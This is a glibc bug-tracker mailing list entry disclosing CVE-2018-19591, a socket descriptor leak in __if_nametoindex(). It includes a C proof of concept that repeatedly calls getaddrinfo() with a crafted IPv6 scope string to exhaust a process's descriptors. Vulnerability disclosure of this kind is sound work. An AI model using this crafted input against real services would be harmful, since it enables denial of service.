This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.
[Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
- From: "guidovranken at gmail dot com" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Tue, 27 Nov 2018 09:24:54 +0000
- Subject: [Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=23927
Bug ID: 23927
Summary: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
Product: glibc
Version: 2.28
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: network
Assignee: unassigned at sourceware dot org
Reporter: guidovranken at gmail dot com
Target Milestone: ---
In sysdeps/unix/sysv/linux/if_index.c, __if_nametoindex() creates a socket
descriptor but does not close it if the 'ifname' parameter is too long. This is
a resource leak (CWE-404).
Additionally, it is possible to call getaddrinfo() with a crafted 'node'
parameter that leads to the offending code in __if_nametoindex().
In short, untrusted hostname resolutions (via getaddrinfo()) lead to descriptor
exhaustion.
MITRE has assigned CVE-2018-19591 for this issue.
Attribution: Guido Vranken
A proof-of-concept follows:
#include <errno.h>
#include <net/if.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Count the descriptors currently open in this process by probing every
   possible descriptor number with fstat(): an open descriptor succeeds, a
   closed one fails with EBADF.  The return value is tested rather than errno,
   because a successful call does not reset errno left over from a failed one. */
static int detect_open_descriptors(void)
{
    int fd_count = 0;
    int max_fd_number = getdtablesize();
    struct stat stats;

    for (int i = 0; i < max_fd_number; i++) {
        if (fstat(i, &stats) == 0)
            fd_count++;
    }
    return fd_count;
}

int main(void)
{
    struct addrinfo hints, *res;

    memset(&hints, 0, sizeof(hints));
    hints.ai_socktype = SOCK_STREAM;

    printf("Open file descriptors before call to getaddrinfo: %d\n",
           detect_open_descriptors());

    /* The text after '%' is an IPv6 scope identifier.  It is 16 characters,
       longer than IFNAMSIZ - 1, so getaddrinfo() passes it to
       __if_nametoindex(), which on affected versions returns early without
       closing the socket it has just opened.  Each iteration leaks one
       descriptor; the printed count rises until the process limit is hit. */
    for (int i = 0; i < 1500; i++) {
        int rc = getaddrinfo("FEA0::%AAAAAAAAAAAAAAAA", NULL, &hints, &res);
        if (rc == 0)
            freeaddrinfo(res);   /* not expected to succeed; avoid a leak of our own */
        printf("Open file descriptors after call to getaddrinfo: %d\n",
               detect_open_descriptors());
    }
    return 0;
}
--
You are receiving this mail because:
You are on the CC list for the bug.